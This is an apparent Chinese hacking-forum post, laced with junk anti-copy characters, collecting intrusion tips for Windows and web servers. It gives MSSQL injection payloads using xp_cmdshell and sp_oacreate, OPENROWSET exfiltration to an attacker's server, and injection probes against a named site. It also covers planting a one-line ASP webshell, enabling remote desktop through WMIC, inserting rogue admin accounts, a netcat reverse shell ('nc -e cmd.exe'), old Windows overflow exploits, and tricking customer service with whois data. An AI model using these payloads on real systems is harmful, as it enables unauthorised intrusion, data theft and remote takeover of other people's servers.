SA点数据库分离技术相关" s T% s' z e8 k2 T. p/ D
* ^- ~# A+ d" p6 ^' F8 ~: @% ]& `( z5 Q. i% t8 G3 a
SA点数据库分离搞法+语句:) I6 G! i+ u1 m& S- P% i! a8 U" r
, L2 j4 V- b, B$ n& Y注射点不显错,执行下面三条语句页面都返回正常。4 E' `* m1 p4 W# m* }
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
6 U# p" Q4 G( @! o# ?- _! s$ `: s! xand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')) Q2 M& g4 G7 M9 h
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
. @7 ~( b! k5 D+ X4 _( C9 q可以列目录,判断系统为2000,web与数据库分离
4 Z8 |8 o2 m' P1 p% e. G* q7 }1 K遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。! K! v }. l$ Z
在注射点上执行$ f* C$ w, q! [, X
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
; U* C5 U5 N# d% F" m: p页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP3 X- }, S4 G5 C$ [% p5 R
还有我用NC监听得其他端口都没有得到IP。0 B7 j3 G- x* S) p5 S0 ]3 |
0 F* q/ o" |: t( C: O' i. q
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
( {4 Z! i! k- D5 W' ^5 M'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--" d/ ^& m8 ~" j9 U( H
p8 T' C5 z3 H; B ^
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--8 k- z8 {! n3 K4 Y" Y
( a) g! L: m! v& Z现在就猜想是不是数据库是内网而且不能连外网。8 \. P6 I$ e7 M7 O" M2 i
( H& `5 f: j1 z! }4 k; d
0 e6 _$ O. T* {! ]
access导出txt文本代码
' S M# t, D/ v8 n6 ]$ vSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
K0 p. d4 G6 f6 n
) X0 h# K- @! M" A# V- I# o S1 F% B9 k0 k& U
" j% R& y1 h4 W( c- x% H* Y" K自动跳转到指定网站代码头6 a: T' b6 D: u
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>4 [6 Q! }" L0 |5 ^1 z2 f' I
" m; C4 V/ a! v) {* D! q& c6 L2 d# {1 t/ O
入侵java or jsp站点时默认配置文件路径:
" x; O" V8 g( {\web-inf\web.xml
7 j& |8 J2 B$ O8 \tomcat下的配置文件位置:
( @% P0 S6 `% r+ _$ t* z8 w# A3 ?\conf\server.xml (前面加上tomcat路径)4 r$ @' v" C( w8 {& h
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml* ^! ~) t6 V# B, P. B
; K0 Y$ D, M" t
" J6 }+ b1 D4 [ O" y" r* t
# ]$ W( i, ]! f) j) W4 A检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
1 c; b3 n$ v3 U( ?6 U4 u6 H-1%23 S" H; l( Z: z
>
9 l- w% c7 x4 B8 ]" f+ o2 U7 _( u' t6 \<
6 ?% b$ C! }' V7 N% d1'+or+'1'='1
" W* ^: m7 q8 l* `! ~id=8%bf
2 B) ~* [, b7 M7 k
3 i2 E: i/ K5 m, p- |, L0 y1 C全新注入点检测试法:
& l2 c0 m. d! q在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。2 N7 E( F! G- K+ k7 |- j
" Z8 O) ^, }; v( n' Z在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。6 X, g/ y4 }/ l5 M% u
5 V: [& L5 ~( ~ B2 m4 M搜索型注入判断方法:2 W# o' w. X# z
北京%' and '1'='1' and '%'='
, d( M' i) C" X8 y8 \ A* _北京%' and '1'='2' and '%'='& m# q; J) m& A+ @
# b( p1 o v4 w* d8 @, s* m
& i9 M) k2 ^8 c, G; o
COOKIES注入:4 m9 I; d% X8 J
9 G( P8 j: c7 F9 J6 x9 Jjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
}# e2 d4 ]3 o! H2 X
8 Y- r2 y7 ~7 M J$ Q* J( V; G7 @& @! z2000专业版查看本地登录用户命令:2 {; V$ Y/ g: Q7 W( P
net config workstation- B; y6 }* m3 b2 g! K. e( F
$ {' J: x) b J0 Q8 A8 f
0 v# |! K0 C2 H' g2003下查看ipsec配置和默认防火墙配置命令:' ~. P6 h7 ~2 g/ d( t% V
netsh firewall show config! u: x+ e1 A; M3 F4 M1 |" J- d
netsh ipsec static show all
/ }# A3 J3 Z& v+ D, t) [- V& V# U9 T, c. {2 w% K
不指派指定策略命令:" f$ b. ], g1 u
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)- A; B9 b8 V$ @' z9 ]
netsh ipsec static show policy all 显示策略名& L9 g9 Y% {' n9 t/ `' b
+ B0 G9 x, k7 A; N0 ~( x7 J- ?9 b2 Z: \* ]+ a* u, r9 v+ M
猜管理员后台小技巧:9 G+ u0 @$ p( T, Q6 }6 H! e
admin/left.asp
& N K" d8 j: N0 c$ G' gadmin/main.asp
: }; D: O- K4 C" Cadmin/top.asp
1 H, C R# F# T, Badmin/admin.asp
0 x8 {& d0 C4 z' z8 }4 R会现出菜单导航,然后迅雷下载全部链接5 `' _1 u; p! O- Q
, |8 Y7 m. T3 L! C; w3 D% i2 O' E% |* P2 J* Q3 o
社会工程学:
% t! A. ~, ?1 B* e5 b( a% Q' I用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
$ E- B0 N5 n9 W; }: G然后去骗客服! s3 c: y1 A0 {3 Z, x1 Y
0 j" r3 U2 z3 {4 ?5 V* d
8 [1 ]% I( |5 J4 p统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: . b, [. l2 i6 @2 t4 P0 u f
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
6 [& J& H7 W7 { 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。7 @* J) T* j" l
) |7 Y8 w7 c$ W' w8 b
4 B" t9 z4 l% J1 S5 s
2 }( Q. d& \8 O% H8 R+ w3 V
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
/ Y h& ]* W# ^+ A! y3 n! P# L
& u3 [% b) |( T5 I
* y' F9 `9 M- o) C' o$ ^0 w& A! S% S" o" H7 l w/ w' F- z% J
CMD加密注册表位置
# Z7 q* w! g- z7 S; ]5 F(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
. x) i# S5 F+ J/ B3 s0 I% dAutoRun2 b- b# m$ A+ H* N! z0 J
; m& u0 Q& G% V1 t3 w1 G(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor" g V( P) }5 L; ^
AutoRun
/ `3 B! @: ^5 ?4 T0 b0 j: [3 g' B
1 c% f$ m) @8 O7 j9 E5 ?! w4 l" v6 N
在找注入时搜索Hidden,把他改成test
0 ?" z, A, t8 y/ g, \0 ~/ m+ N d& h9 Y8 m
, W2 h {% e G; V4 q, B: x
( Q: c* F# ^+ j9 z! g( W( B6 f' r
mstsc /v:IP /console 8 S% K3 `$ g4 m( z+ n/ H
% M5 n$ I1 b3 K+ d3 F6 z" F" b6 k1 G
/ [% A7 B6 ~7 J% `3 w. M9 Q( l5 V% `
一句话开3389:4 {# _6 m3 [, u
# e6 I# K3 Y0 q2 p: l6 V
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
: T0 {* c2 d8 a Z4 r0 N开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.% l5 x$ ]: ^; ]
- O0 n( W) }" a+ M, \
' M$ |' T9 O) V) l7 w. S3 e5 @知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
4 g) m& J- S3 ?, Q* rInsert into admin(user,pwd) values('test','test')6 [3 S0 |3 f" ~2 t2 F; } o
% i$ a) F7 z2 D" W! B) h& b' D; G& T
5 @8 T: P' d: P7 w; UNC反弹7 M$ L: M. R: X; {' u9 X
先在本机执行: nc -vv -lp 监听的端口 (自己执行) 1 ]/ _. I& P! ]. j* [+ U7 g
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
$ g5 c+ m! g, ]) j5 h: |3 {/ c2 Q, A
1 S+ w8 i/ f* R' C6 V+ a/ h9 S在脚本入侵过程中要经常常试用%00来确认下参数是否有问题) R0 l+ {( l/ A: x( F# R
% J0 r0 Y& }4 A) n7 x有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录; U4 w p: T( r- {6 w6 c& V- _
例如:
, Y! F5 j4 N; a+ {subst k: d:\www\ 用d盘www目录替代k盘
- F- h/ A6 I; f; @7 k qsubst k: /d 解除K盘代替 |
匿名
发表于 2017-12-20 02:36:51
发表于 2012-9-15 14:41:29
收藏
支持
反对